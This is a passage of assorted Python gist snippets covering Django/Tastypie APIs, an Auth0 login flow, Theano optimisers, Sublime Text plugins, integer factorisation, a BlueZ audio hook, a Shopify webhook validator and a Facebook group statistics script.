related_resource=field.attribute,
)
resource = url(resource, field.to_class().wrap_view('get_list'), name="api_dispatch_detail")
urls.append(resource)
return urls
class HandResource(ModelResource):
fingers = fields.ToManyField('sandbox.api.FingerResource', 'fingers', 'hand')
class Meta:
queryset = models.Hand.objects.all()
resource_name = 'hands'
api_name = 'v1'
class FingerResource(ModelResource):
hand = fields.ForeignKey('sandbox.api.HandResource', 'hand')
bones = fields.ToManyField('sandbox.api.BoneResource', 'bones', 'finger')
class Meta:
queryset = models.Finger.objects.all()
resource_name = 'fingers'
api_name = 'v1'
filtering = {
"hand": ('exact',),
}
class BoneResource(ModelResource):
finger = fields.ForeignKey('sandbox.api.BoneResource', 'finger')
class Meta:
queryset = models.Bone.objects.all()
resource_name = 'bones'
api_name = 'v1'
filtering = {
"finger": ('exact',),
}
```
#### File: hard-gists/814599/snippet.py
```python
from MySQLdb.cursors import SSDictCursor
def iterate_query(query, connection, arraysize=1):
c = connection.cursor(cursorclass=SSDictCursor)
c.execute(query)
while True:
nextrows = c.fetchmany(arraysize)
if not nextrows:
break
for row in nextrows:
yield row
c.close()
results = iterate_query(SQL, conn, arraysize=100)
for row_dict in results:
print row_dict
```
#### File: hard-gists/8149412/snippet.py
```python
import webapp2
import urllib2
import urllib
import json
## CHANGE THIS
CLIENT_ID = "vYPeq7LGf1utg2dbDlGKCwGKgy94lPH0"
CLIENT_SECRET = "<KEY>"
DOMAIN = "contoso.auth0.com"
CALLBACK_URL = "http://localhost:8080/callback"
MAIN_PAGE_HTML = """\
<html>
<body>
<script src="https://cdn.auth0.com/w2/auth0-widget-2.6.min.js"></script>
<script type="text/javascript">
var widget = new Auth0Widget({
domain: '%s',
clientID: '%s',
callbackURL: '%s'
});
</script>
<button onclick="widget.signin()">Login</button>
</body>
</html>
""" % (DOMAIN, CLIENT_ID, CALLBACK_URL)
class MainPage(webapp2.RequestHandler):
def get(self):
self.response.write(MAIN_PAGE_HTML)
class LoginCallback(webapp2.RequestHandler):
def get(self):
code = self.request.get("code")
base_url = "https://{domain}".format(domain=DOMAIN)
data = urllib.urlencode([('client_id', CLIENT_ID),
('redirect_uri', CALLBACK_URL),
('client_secret', CLIENT_SECRET),
('code', code),
('grant_type', 'authorization_code')])
req = urllib2.Request(base_url + "/oauth/token", data)
response = urllib2.urlopen(req)
oauth = json.loads(response.read())
userinfo = base_url + "/userinfo?access_token=" + oauth['access_token']
response = urllib2.urlopen(userinfo)
data = response.read()
## print user data
self.response.write(data)
application = webapp2.WSGIApplication([
('/', MainPage),
('/callback', LoginCallback)
], debug=True)
```
#### File: hard-gists/816134462577399ee8b2/snippet.py
```python
import theano.tensor as T
import numpy as np
import theano
class rmsprop(object):
"""
RMSProp with nesterov momentum and gradient rescaling
"""
def __init__(self, params):
self.running_square_ = [theano.shared(np.zeros_like(p.get_value()))
for p in params]
self.running_avg_ = [theano.shared(np.zeros_like(p.get_value()))
for p in params]
self.memory_ = [theano.shared(np.zeros_like(p.get_value()))
for p in params]
def updates(self, params, grads, learning_rate, momentum, rescale=5.):
grad_norm = T.sqrt(sum(map(lambda x: T.sqr(x).sum(), grads)))
not_finite = T.or_(T.isnan(grad_norm), T.isinf(grad_norm))
grad_norm = T.sqrt(grad_norm)
scaling_num = rescale
scaling_den = T.maximum(rescale, grad_norm)
# Magic constants
combination_coeff = 0.9
minimum_grad = 1E-4
updates = []
for n, (param, grad) in enumerate(zip(params, grads)):
grad = T.switch(not_finite, 0.1 * param,
grad * (scaling_num / scaling_den))
old_square = self.running_square_[n]
new_square = combination_coeff * old_square + (
1. - combination_coeff) * T.sqr(grad)
old_avg = self.running_avg_[n]
new_avg = combination_coeff * old_avg + (
1. - combination_coeff) * grad
rms_grad = T.sqrt(new_square - new_avg ** 2)
rms_grad = T.maximum(rms_grad, minimum_grad)
memory = self.memory_[n]
update = momentum * memory - learning_rate * grad / rms_grad
update2 = momentum * momentum * memory - (
1 + momentum) * learning_rate * grad / rms_grad
updates.append((old_square, new_square))
updates.append((old_avg, new_avg))
updates.append((memory, update))
updates.append((param, param + update2))
return updates
class sgd_nesterov(object):
def __init__(self, params):
self.memory_ = [theano.shared(np.zeros_like(p.get_value()))
for p in params]
def updates(self, params, grads, learning_rate, momentum):
updates = []
for n, (param, grad) in enumerate(zip(params, grads)):
memory = self.memory_[n]
update = momentum * memory - learning_rate * grad
update2 = momentum * momentum * memory - (
1 + momentum) * learning_rate * grad
updates.append((memory, update))
updates.append((param, param + update2))
return updates
class sgd(object):
# Only here for API conformity with other optimizers
def __init__(self, params):
pass
def updates(self, params, grads, learning_rate):
updates = []
for n, (param, grad) in enumerate(zip(params, grads)):
updates.append((param, param - learning_rate * grad))
return updates
"""
Usage:
grads = T.grad(cost, self.params)
#opt = sgd_nesterov(self.params)
opt = rmsprop(self.params)
updates = opt.updates(self.params, grads,
learning_rate / np.cast['float32'](self.batch_size),
momentum)
"""
```
#### File: hard-gists/8169809/snippet.py
```python
import bs4, collections, console, requests, scene
tkColorDict = collections.OrderedDict() # key = tkinter color name
def loadTkColorDict(): # will automaticly be called by getColor() if needed
tkColorURL = 'http://www.tcl.tk/man/tcl8.6/TkCmd/colors.htm'
print('Loading tkinter colors from: ' + tkColorURL)
tkColorSoup = bs4.BeautifulSoup(requests.get(tkColorURL).text).tbody
print('Soup is ready. Creating color table...')
for tableRow in tkColorSoup.find_all('tr'):
colorInfo = [x.text for x in tableRow.find_all('p')]
if colorInfo[0] != 'Name': # skip the table header
tkColorDict[colorInfo[0]] = (int(colorInfo[1]) / 255.0, # red
int(colorInfo[2]) / 255.0, # green
int(colorInfo[3]) / 255.0) # blue
# optionaly show the results...
for colorName in tkColorDict: # 752 colors
#console.set_color(*tkColorDict[colorName]) # some colors are not visible
print('{:<22} = {}'.format(colorName, tkColorDict[colorName]))
print('tkColorDict now contains {} colors.\n'.format(len(tkColorDict)))
def getColor(inColorName = 'grey'):
if not tkColorDict: # if tkColorDict has not been initialized
loadTkColorDict() # then put tkinter colors into tkColorDict
try:
return scene.Color(*tkColorDict[inColorName])
except KeyError:
print("'{}' is not a valid color. Substituting grey...".format(inColorName))
return getColor()
if __name__ == '__main__':
lgy = getColor('light goldenrod yellow')
#console.set_color(lgy.r, lgy.g, lgy.b) # some colors are not visble
print("getColor('{}') = ({}, {}, {})".format('light goldenrod yellow', lgy.r, lgy.g, lgy.b))
testColorNames = ('black white red green blue Bob').split()
for testColorName in testColorNames:
testColor = getColor(testColorName)
console.set_color(testColor.r, testColor.g, testColor.b)
print("getColor('{}') = ({}, {}, {})".format(testColorName, testColor.r, testColor.g, testColor.b))
console.set_color(0, 0, 0) # back to black
```
#### File: hard-gists/817a70706587da3bd862835c59ef584e/snippet.py
```python
import os
import io
from PIL import Image
from django.core.urlresolvers import reverse
from django.conf import settings
from rest_framework import status
from rest_framework.test import APITestCase
from rest_framework.authtoken.models import Token
from rest_framework.renderers import JSONRenderer
# Custom user model based on Django Auth AbstractUser
from account.models import User
class CrewUploadPhotoTests(APITestCase):
fixtures = []
maxDiff = None
def setUp(self):
# Normal user
self.normal_user = User.objects.create(
first_name="Bob",
last_name="Green",
username="<EMAIL>",
email="<EMAIL>",
is_active=True,
is_staff=False)
self.normal_user.set_password('<PASSWORD>')
self.normal_user.save()
self.normal_token, created = Token.objects.get_or_create(
user=self.normal_user)
def generate_photo_file(self):
file = io.BytesIO()
image = Image.new('RGBA', size=(100, 100), color=(155, 0, 0))
image.save(file, 'png')
file.name = 'test.png'
file.seek(0)
return file
def test_upload_photo(self):
"""
Test if we can upload a photo
"""
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.normal_token.key)
url = reverse('crew-api:upload-photo', args=[self.normal_user.crew.uuid])
photo_file = self.generate_photo_file()
data = {
'photo':photo_file
}
response = self.client.post(url, data, format='multipart')
self.assertEqual(response.status_code, status.HTTP_200_OK)
```
#### File: hard-gists/821473a1596f1429024cb1eadb471927/snippet.py
```python
import logging
from optparse import OptionParser
import os
from osgeo import ogr
def log_file_fields(filename):
print("File: " + filename)
source = ogr.Open(filename)
for i in range(source.GetLayerCount()):
layer = source.GetLayerByIndex(i)
layerName = layer.GetName()
print("Layer: " + layerName)
stringFields = []
layerDefinition = layer.GetLayerDefn()
for n in range(layerDefinition.GetFieldCount()):
fieldDefinition = layerDefinition.GetFieldDefn(n)
fieldName = fieldDefinition.GetName()
fieldTypeCode = fieldDefinition.GetType()
fieldType = fieldDefinition.GetFieldTypeName(fieldTypeCode)
if fieldType == "String":
stringFields.append(fieldName)
print("String Fields:")
for field in stringFields:
sql = 'SELECT %s FROM %s' % (field, layerName)
fieldLayer = source.ExecuteSQL(sql)
values = {}
for i, feature in enumerate(fieldLayer):
values[feature.GetField(0)] = values.get(feature.GetField(0), 0) + 1
print("Field: " + field)
for key in sorted(values.keys()):
print("'%s': %d" % (key, values[key]))
print("\n")
def _main():
usage = "usage: %prog"
parser = OptionParser(usage=usage,
description="")
parser.add_option("-d", "--debug", action="store_true", dest="debug",
help="Turn on debug logging")
parser.add_option("-q", "--quiet", action="store_true", dest="quiet",
help="turn off all logging")
(options, args) = parser.parse_args()
logging.basicConfig(level=logging.DEBUG if options.debug else
(logging.ERROR if options.quiet else logging.INFO))
for arg in args:
log_file_fields(arg)
if __name__ == "__main__":
_main()
```
#### File: hard-gists/824628/snippet.py
```python
from django.core.management.base import BaseCommand, CommandError
from optparse import make_option
from datetime import datetime
import simplejson as json
import urllib, urllib2, time
from hotspot.twitterklout.models import Tweet, Tweeter, Hashtag, Event, Location
#from django.db import models
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--long', '-l', dest='long',
help='Help for the long options'),
)
help = 'this is an automated script (use Cron) to collect data'
#self.can_import_settings = True
#pullDataFromTwitter
def handle(self, **options):
print 'oh hai wrld'
events = Event
querySet = events.objects.all()
for events in querySet:
self.pullTweets(events)
#pullDataFromTwitter(Event.objects.filter(isActive = True))
def pullTweets(self, obj):
#print obj.name
if obj.isActive() == True:
url = 'http://search.twitter.com/search.json?q=%23' + obj.Hashtag.tag
print obj.name
import twitter
api = twitter.Api()
try:
#req = urllib2.Request(url)
#response = urllib2.urlopen(req)
#the_page = response.read()
#print the_page
#loadedJson = json.loads(the_page)
#loadedJson = json.loads(response.read())
results = api.GetSearch(term=obj.Hashtag.tag)
#print results[0].text
flag = 0
while (results[flag].id != obj.Hashtag.lastStatusID) and (flag !=10):
print results[flag].text
print results[flag].user.screen_name
newTweeter = Tweeter(username=results[flag].user.screen_name)
users = Tweeter
userquerySet = Tweeter.objects.all()
userTest = False
for user in userquerySet:
if user.username == results[flag].user.screen_name:
userTest=True
if userTest == True:
newTweeter = Tweeter(username=results[flag].user.screen_name)
newTweeter.save()
newTweet = Tweet(content=results[flag].text, Tweeter=user)
newTweet.save()
break
flag = flag + 1
#obj.Hashtag.lastStatusID.save(results[0].id)
#obj.Hashtag.lastStatusID.save()
#print self.sentiment
except Exception, detail:
print "Err ", detail
```
#### File: hard-gists/8336771/snippet.py
```python
import sublime, sublime_plugin
BLOCKLEN = 4
class TypeFileOutCommand(sublime_plugin.TextCommand):
def nextchar(self):
if self.body:
totype = []
while 1:
try:
ch = self.body.pop(0)
except IndexError:
totype.append(ch)
break
totype.append(ch)
if ch in ["\n", " "] or len(totype) > BLOCKLEN:
break
self.view.insert(self.edit, self.view.sel()[0].begin(), "".join(totype))
timeout = 10
if "\n" in totype:
timeout = 250
elif " " in totype:
timeout = 80
sublime.set_timeout(self.nextchar, timeout)
def run(self, edit):
self.edit = edit
# First, read everything in this view
reverything = sublime.Region(0, self.view.size())
self.body = list(self.view.substr(reverything))
self.view.erase(edit, reverything)
sublime.set_timeout(self.nextchar, 2000)
```
#### File: hard-gists/839f6a3534002a6a29d819666a28bf5e/snippet.py
```python
import random
from queue import *
def gcd(a,b):
while b:
a,b=b,a%b
return a
def expo(a,b):
x,y=1,a
while(b>0):
if(b&1):
x=x*y
y=y*y
b>>=1
return x
primes=[0]*100000
def sieve():
primes[1]=1
primes[2]=2
j=4
while(j<100000):
primes[j]=2
j+=2
j=3
while(j<100000):
if primes[j]==0:
primes[j]=j
i=j*j
k=j<<1
while(i<100000):
primes[i]=j
i+=k
j+=2
def rabin_miller(p):
if(p<100000):
return primes[p]==p
if(p%2==0):
return False
s=p-1
while(s%2==0):
s>>=1
for i in range(5):
a=random.randrange(p-1)+1
temp=s
mod=pow(a,temp,p)
while(temp!=p-1 and mod!=1 and mod!=p-1):
mod=(mod*mod)%p
temp=temp*2
if(mod!=p-1 and temp%2==0):
return False
return True
def brent(N):
if(N%2==0):
return 2
if(N<100000):
return primes[N]
y,c,m = random.randint(1, N-1),random.randint(1, N-1),random.randint(1, N-1)
g,r,q = 1,1,1
while g==1:
x=y
for i in range(r):
y=((y*y)%N+c)%N
k=0
while(k<r and g==1):
ys=y
for i in range(min(m,r-k)):
y=((y*y)%N+c)%N
q=q*(abs(x-y))%N
g=gcd(q,N)
k=k+m
r=r*2
if g==N:
while True:
ys=((ys*ys)%N+c)%N
g=gcd(abs(x-ys),N)
if g>1:
break
return g
def factor(n):
Q_1=Queue()
Q_2=[]
Q_1.put(n)
while(not Q_1.empty()):
l=Q_1.get()
if(rabin_miller(l)):
Q_2.append(l)
continue
d=brent(l)
if(d==l):
Q_1.put(l)
else:
Q_1.put(d)
Q_1.put(l//d)
return Q_2
if __name__ == "__main__":
sieve()
t=int(input())
for test in range(t):
n=int(input())
if(n==1):
print ("Case %s: 1"%(test+1))
continue
L=factor(n)
L.sort()
i=0
ans=1
while(i<len(L)):
cnt=L.count(L[i])
pk=[0]*(cnt+1)
pk[0]=1
for j in range(cnt):
pk[j+1]=pk[j]*L[i]
temp=0
cnt+=1
val=cnt*2-1
for j in range(cnt):
temp+=val*pk[j]
val-=2
ans*=temp
i+=cnt-1
print ("Case %s: %s"%(test+1,ans))
```
#### File: hard-gists/8406352/snippet.py
```python
import gobject
import dbus
import dbus.mainloop.glib
import os
def property_changed(name, value, path, interface):
iface = interface[interface.rfind(".") + 1:]
val = str(value)
print "{%s.PropertyChanged} [%s] %s = %s" % (iface, path, name, val)
# we want this event: {Control.PropertyChanged} [/org/bluez/16797/hci0/dev_00_24_7E_51_F7_52] Connected = true
# and when that happens: pactl load-module module-loopback source=bluez_source.00_24_7E_51_F7_52
if iface == "Control" and name == "Connected" and val == "1":
bt_addr = "_".join(path.split('/')[-1].split('_')[1:])
cmd = "pactl load-module module-loopback source=bluez_source.%s" % bt_addr
os.system(cmd)
# here we want this event: {Control.PropertyChanged} [/org/bluez/16797/hci0/dev_00_24_7E_51_F7_52] Connected = false
# and when that happens, we unload all loopback modules whose source is our bluetooth device
elif iface == "Control" and name == "Connected" and val == "0":
bt_addr = "_".join(path.split('/')[-1].split('_')[1:])
cmd = "for i in $(pactl list short modules | grep module-loopback | grep source=bluez_source.%s | cut -f 1); do pactl unload-module $i; done" % bt_addr
os.system(cmd)
def object_signal(value, path, interface, member):
iface = interface[interface.rfind(".") + 1:]
val = str(value)
print "{%s.%s} [%s] Path = %s" % (iface, member, path, val)
if __name__ == '__main__':
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
bus = dbus.SystemBus()
bus.add_signal_receiver(property_changed, bus_name="org.bluez", signal_name = "PropertyChanged", path_keyword="path", interface_keyword="interface")
mainloop = gobject.MainLoop()
mainloop.run()
```
#### File: hard-gists/8477219/snippet.py
```python
from django.db import connection, models
class MyManager(Manager):
def raw_as_qs(self, raw_query, params=()):
"""Execute a raw query and return a QuerySet. The first column in the
result set must be the id field for the model.
:type raw_query: str | unicode
:type params: tuple[T] | dict[str | unicode, T]
:rtype: django.db.models.query.QuerySet
"""
cursor = connection.cursor()
try:
cursor.execute(raw_query, params)
return self.filter(id__in=(x[0] for x in cursor))
finally:
cursor.close()
class MyModel(models.Model):
objects = MyManager()
```
#### File: hard-gists/8513270/snippet.py
```python
import hashlib, base64, hmac, json, settings
def shopify_webhook(f):
"""
A decorator thats checks and validates a Shopify Webhook request.
"""
def _hmac_is_valid(body, secret, hmac_to_verify):
hash = hmac.new(body, secret, hashlib.sha256)
hmac_calculated = base64.b64encode(hash.digest())
return hmac_calculated == hmac_to_verify
@wraps(f)
def wrapper(request, *args, **kwargs):
# Try to get required headers and decode the body of the request.
try:
webhook_topic = request.META['HTTP_X_SHOPIFY_TOPIC']
webhook_hmac = request.META['HTTP_X_SHOPIFY_HMAC_SHA256']
webhook_data = json.loads(request.body)
except:
return HttpResponseBadRequest()
# Verify the HMAC.
if not _hmac_is_valid(request.body, settings.SHOPIFY_API_SECRET, webhook_hmac):
return HttpResponseForbidden()
# Otherwise, set properties on the request object and return.
request.webhook_topic = webhook_topic
request.webhook_data = webhook_data
return f(request, args, kwargs)
return wrapper
```
#### File: hard-gists/8555297/snippet.py
```python
import sublime
import sublime_plugin
class OpenFromClipboardCommand(sublime_plugin.WindowCommand):
def run(self):
fn = sublime.get_clipboard()
if fn:
sublime.active_window().open_file(fn)
else:
sublime.status_message("Nothing to open. The clipboard is empty.")
```
#### File: hard-gists/8577232/snippet.py
```python
from Queue import Queue # Threadsafe queue for threads to use
from collections import Counter # To count stuff for us
import datetime # Because datetime printing is hard
from pprint import pprint
import time # Should be obvious
import subprocess # Used to send notifications on mac
import sys # Get system info
import threading # Should be obvious
import json # Also obvious
# FB API wrapper ("pip install facebook-sdk")
import facebook
__author__ = '<NAME>'
appeared = dict()
# For printing pretty colors in terminal
class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
# If you're on mac, install terminal-notifier ("brew install terminal-notifier")
# to get nifty notifications when it's done
def notify_mac():
if sys.platform == "darwin":
try:
subprocess.call(
["terminal-notifier", "-message", "Done", "-title", "FB_Bot",
"-sound", "default"])
except OSError:
print "If you have terminal-notifier, this would be a notification"
# Log message with colors
# ... I never learned the proper way to log in python
def log(message, *colorargs):
if len(colorargs) > 0:
print colorargs[0] + message + color.END
else:
print message
# Junk method used for testing
def test():
log("Test")
# Export method, recieves a jsonObj of style {"label": dictionary}
def exportData(jsonDict):
# Do stuff
print "Exported"
# print jsonDict
# Thread class. Each thread gets all the data from a certain date range
class RequestThread(threading.Thread):
def __init__(self, queue, apikey, query, curr_time, num_weeks):
# Super class
threading.Thread.__init__(self)
# Queue object given from outside. Queues are threadsafe
self.queue = queue
# Graph object for our call, authenticated with a token
self.graph = facebook.GraphAPI(apikey)
# FQL query with specified date range
self.input_query = query
# Counters. t-total, p-posts, c-comments
self.tcounter = Counter()
self.pcounter = Counter()
self.ccounter = Counter()
self.tpcounter = Counter()
self.tccounter = Counter()
self.cccounter = Counter()
# Time range, for logging
self.time_range = datetime.datetime.fromtimestamp(
curr_time - num_weeks).strftime('%Y-%m-%d') + "-" + \
datetime.datetime.fromtimestamp(curr_time).strftime(
'%Y-%m-%d')
# Main runner
def run(self):
log("\t(" + self.time_range + ') - Getting posts...')
# Get group posts
try:
group_posts = self.graph.fql(query=self.input_query)
except facebook.GraphAPIError as e:
# 99% of the time this is just an expired API access token
log("Error: " + str(e), color.RED)
sys.exit()
log("\t(" + self.time_range + ") - " +
str(len(group_posts)) + " posts")
# Iterate over posts
if len(group_posts) != 0:
for post in group_posts:
comments_query = \
"SELECT fromid, likes, id, time FROM comment WHERE post_id="
# If it's a new actor
if post['actor_id'] in appeared.keys():
if appeared[post['actor_id']] > int(post['created_time']):
appeared[post['actor_id']] = int(post['created_time'])
else:
appeared[post['actor_id']] = int(post['created_time'])
# Add post's like count to that user in our total_likes_counter
self.tcounter[post['actor_id']] += post[
'like_info']['like_count']
# Add to top like posts counter
self.pcounter[post['post_id']] = post['like_info'][
'like_count']
# Timestamp of post by
day_timestamp = datetime.datetime.fromtimestamp(int(post['created_time']))
day_timestamp = day_timestamp.replace(hour=0, minute=0, second=0, microsecond=0)
day_timestamp = (day_timestamp - datetime.datetime(1970, 1, 1)).total_seconds()
# Add to post count
self.tpcounter[str(day_timestamp)] += 1
# Initialize controversial counter
self.cccounter[post['post_id']] += 1
# Get likes on comments
comments = self.graph.fql(
comments_query + "\"" + str(post['post_id']) +
"\" LIMIT 350")
# Iterate over comments
if len(comments) != 0:
log("\t(" + self.time_range + ") - " + str(
len(comments)) + " comments")
log("\t(" + self.time_range + ') - Getting comments...')
for c in comments:
# add their like counts to their respective users
# in our total_likes_counter
self.tcounter[c['fromid']] += c['likes']
# add like count to top_comments_likes_counter
self.ccounter[c['id']] = c['likes']
# Add to comment count
self.tccounter[str(day_timestamp)] += 1
# Add to controversial counter
self.cccounter[post['post_id']] += 1
# If it's a new actor
if c['fromid'] in appeared.keys():
if appeared[c['fromid']] > int(c['time']):
appeared[c['fromid']] = int(c['time'])
else:
appeared[c['fromid']] = int(c['time'])
else:
log("\tNo comments from this post")
else:
log("\tNo posts from this time frame")
self.queue.put({'t': self.tcounter, 'p': self.pcounter, 'c':
self.ccounter, 'tp': self.tpcounter,
'tc': self.tccounter, 'cc': self.cccounter})
# Method for counting various total likes in a group
def count_group_likes():
# Access token can be obtained by doing the following:
# - Log into facebook
# - Go to this url: https://developers.facebook.com/tools/explorer
fb_API_access_token = "token_goes_here"
# Only necessary if you want to get an extended access token
# You'll have to make a facebook app and generate a token with it
# You'll also need to get the following two values from it
fb_app_id = "id_goes_here"
fb_secret_key = "key_goes_here"
# Counter object to do the counting for us
total_likes_counter = Counter()
top_liked_posts_counter = Counter()
top_liked_comments_counter = Counter()
total_posts_counter = Counter()
total_comments_counter = Counter()
most_discussed_counter = Counter()
group_id = "id_goes_here" # Unique ID of the group to search.
num_of_items_to_return = 30 # Return the top ____ most liked ____
# Put the number of weeks you want it to increment by each time
# smaller is better, but too small and you could hit your rate limit
# ... which is 600 calls per 600 seconds. Maybe apps get more
num_weeks = int("2")
# Convert to unix time
num_weeks_unix = num_weeks * 604800
# Start date, in unix time (our group was made 2/13/12)
# You can use this to convert: http://goo.gl/4QMFbW
start_date = int("start_date_goes_here")
datetime_start_date = datetime.datetime.fromtimestamp(start_date)
# Query strings for FQL
posts_query = \
"SELECT post_id, like_info, actor_id, created_time FROM stream" + \
" WHERE source_id=" + group_id + " AND created_time<"
person_query = "SELECT first_name, last_name FROM user WHERE uid="
# Authorize our API wrapper
graph = facebook.GraphAPI(fb_API_access_token)
# Code to programatically extend key
if extend_key:
result = graph.extend_access_token(fb_app_id, fb_secret_key)
new_token = result['access_token']
new_time = int(result['expires']) + time.time()
# This will print out new extended token and new expiration date
# Copy them and replace your token above with this one
print 'New token: ' + new_token
print 'New expiration date: ' + datetime.datetime.fromtimestamp(
new_time).strftime('%Y-%m-%d %H:%M:%S')
log('Getting group posts', color.BLUE)
# Send end time to current time and work backward
end_time = int(time.time())
# Or manually set end time
# end_time = <end_time>
log('Current date is: ' + datetime.datetime.fromtimestamp(
end_time).strftime('%Y-%m-%d'))
log('Incrementing by ' + str(num_weeks) + ' weeks at a time')
# List of thread objects
threads = []
# Threadsafe queue for the threads to dump their data in
final_queue = Queue()
log("Initializing threads...", color.BLUE)
# While loop that creates the threads
# Instantiates each thread with calculated time, keeps decrementing to
# start
while end_time > start_date:
# New query
new_query = posts_query + str(
end_time) + " AND created_time>" + \
str(end_time - num_weeks_unix) + " LIMIT 600"
# Thread creation
t = RequestThread(final_queue, fb_API_access_token, new_query,
end_time, num_weeks_unix)
# Add it to our list
threads.append(t)
# Decrement the time
end_time -= num_weeks_unix
# Start the thread
t.start()
log("Joining threads...", color.BLUE)
# Wait for all the threads to finish before counting everything up
for t in threads:
t.join()
log("Done, merging data...", color.BLUE)
# Count up all the data by merging all the counters from each thread result
for stuff in list(final_queue.queue):
total_likes_counter += stuff['t']
top_liked_posts_counter += stuff['p']
top_liked_comments_counter += stuff['c']
total_posts_counter += stuff['tp']
total_comments_counter += stuff['tc']
most_discussed_counter += stuff['cc']
most_active_day_counter = total_posts_counter + total_comments_counter
# Returns key-value list of most liked people
most_common_people = total_likes_counter.most_common(
num_of_items_to_return)
top_posts = top_liked_posts_counter.most_common(num_of_items_to_return)
top_comments = top_liked_comments_counter.most_common(
num_of_items_to_return)
total_posts = total_posts_counter.most_common(num_of_items_to_return)
total_comments = total_comments_counter.most_common(num_of_items_to_return)
most_active_days = most_active_day_counter.most_common(num_of_items_to_return)
most_discussed = most_discussed_counter.most_common(num_of_items_to_return)
top_people_stats = []
# Iterate over top people and retrieve names from their ID's
# Use enumerate to keep track of indices for rank numbers
log('\nPeople Stats', color.BOLD)
log("* = Weighted average calc'd from user's first post date")
for i, x in enumerate(most_common_people):
person = graph.fql(person_query + str(x[0]))[0]
now = datetime.datetime.now()
join_date = datetime.datetime.fromtimestamp(appeared[x[0]])
diff1 = now - datetime_start_date
diff2 = now - join_date
avg = x[1] / (diff1.total_seconds()/60/60/24/7)
weighted_avg = x[1] / (diff2.total_seconds()/60/60/24/7)
top_people_stats.append({
"name": person['first_name'] + " " + person['last_name'],
"likes": x[1],
"avg": avg,
"augmented_avg": weighted_avg,
"first": int((join_date - datetime.datetime(1970, 1, 1)).total_seconds())
})
print '#' + str(i+1) + '. ' + person['first_name'] + " " + person['last_name']
print '-- Likes: ' + str(x[1])
print '-- Weekly average: ' + str(avg)
print '-- Weekly average*: ' + str(weighted_avg)
print '-- First post: ' + join_date.strftime('%Y-%m-%d')
# Iterate over top posts and get info
log('\nTop posts!', color.BOLD)
for x in top_posts:
post = graph.get_object(str(x[0]))
s = str(x[1]) + " - " + post['from']['name'] + " - " + post['type']
print s
if 'message' in post:
m = str(post['message'].encode('ascii', 'ignore')).replace('\n', ' ')
if len(m) > 70:
print '-- ' + m[0:70] + "..."
else:
print '-- ' + m
print '-- http://www.facebook.com/' + post['id']
# Iterate over top comments and get info
log('\nTop comments!', color.BOLD)
for x in top_comments:
comment = graph.get_object(str(x[0]))
s = str(x[1]) + " - " + comment['from']['name']
print s
if 'message' in comment:
c = str(comment['message'].encode('ascii', 'ignore')).replace('\n', ' ')
if len(c) > 70:
print '-- ' + c[0:70] + "..."
else:
print '-- ' + c
print '-- http://www.facebook.com/' + comment['id']
# Iterate over total posts/comments and calculate info
log('\nMost active days (by number of posts and comments)', color.BOLD)
for x in most_active_days:
d = datetime.datetime.fromtimestamp(float(x[0])).strftime('%m/%d/%Y')
print str(x[1]) + " - " + d
# Iterate over total posts and calculate info
log('\nMost active days (by number of posts)', color.BOLD)
for x in total_posts:
d = datetime.datetime.fromtimestamp(float(x[0])).strftime('%m/%d/%Y')
print str(x[1]) + " - " + d
# Iterate over total comments and calculate info
log('\nMost active days (by number of comments)', color.BOLD)
for x in total_comments:
d = datetime.datetime.fromtimestamp(float(x[0])).strftime('%m/%d/%Y')
print str(x[1]) + " - " + d
# Iterate over top posts and get info
log('\nMost discussed', color.BOLD)
for x in most_discussed:
post = graph.get_object(str(x[0]))
s = str(x[1]) + " - " + post['from']['name'] + " - " + post['type']
print s
if 'message' in post:
m = str(post['message'].encode('ascii', 'ignore')).replace('\n', ' ')
if len(m) > 70:
print '-- ' + m[0:70] + "..."
else:
print '-- ' + m
print '-- http://www.facebook.com/' + post['id']
log('\nExporting...', color.BLUE)
dataDict = json.dumps({"top_people_stats": top_people_stats,
"top_liked_posts_counter": top_liked_posts_counter,
"top_liked_comments_counter": top_liked_comments_counter,
"total_posts_counter": total_posts_counter,
"total_comments_counter": total_comments_counter,
"most_active_day_counter": most_active_day_counter,
"most_common_people": most_common_people,
"top_posts": top_posts,
"top_comments": top_comments,
"total_posts": total_posts,
"total_comments": total_comments,
"most_active_days": most_active_days})
exportData(dataDict)
args = sys.argv
extend_key = False # boolean for if we want to extend token access
if len(args) > 1:
if "--extend" in args: # Pass in flag
extend_key = True
if "test" in args:
test()
sys.exit()
else:
log('No args specified')
count_group_likes()
notify_mac()
```
#### File: hard-gists/8617378/snippet.py
```python
from django.db import models
class Thing(models.Model):
# [ snip ]
def is_deletable(self):
for rel in self._meta.get_all_related_objects():
if rel.model.objects.filter(**{rel.field.name: self}).exists():
return False
return True
```
#### File: hard-gists/8659759/snippet.py
```python
import re
from django.utils.encoding import force_text
from django.core.exceptions import ValidationError
class DomainNameValidator(object):
"""
Domain name validator adapted from Django's EmailValidator.
"""
message = 'Enter a valid domain name.'
code = 'invalid'
domain_regex = re.compile(
r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}|[A-Z0-9-]{2,})$' # domain
# literal form, ipv4 address (SMTP 4.1.3)
r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
re.IGNORECASE)
domain_whitelist = ['localhost']
def __init__(self, message=None, code=None, whitelist=None):
if message is not None:
self.message = message
if code is not None:
self.code = code
if whitelist is not None:
self.domain_whitelist = whitelist
def __call__(self, value):
value = force_text(value)
if not value:
raise ValidationError(self.message, code=self.code)
if (not value in self.domain_whitelist and
not self.domain_regex.match(value)):
# Try for possible IDN domain-part
try:
value = value.encode('idna').decode('ascii')
if not self.domain_regex.match(value):
raise ValidationError(self.message, code=self.code)
else:
return
except UnicodeError:
pass
raise ValidationError(self.message, code=self.code)
validate_domain_name = DomainNameValidator()
def is_valid_domain_name(value):
try:
validate_domain_name(value)
return True
except ValidationError:
pass
return False
```
#### File: hard-gists/8663d3bbfd586bffecf6a0094cd116f2/snippet.py
```python
import functools
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
def doublewrap(function):
"""
A decorator decorator, allowing to use the decorator to be used without
parentheses if not arguments are provided. All arguments must be optional.
"""
@functools.wraps(function)
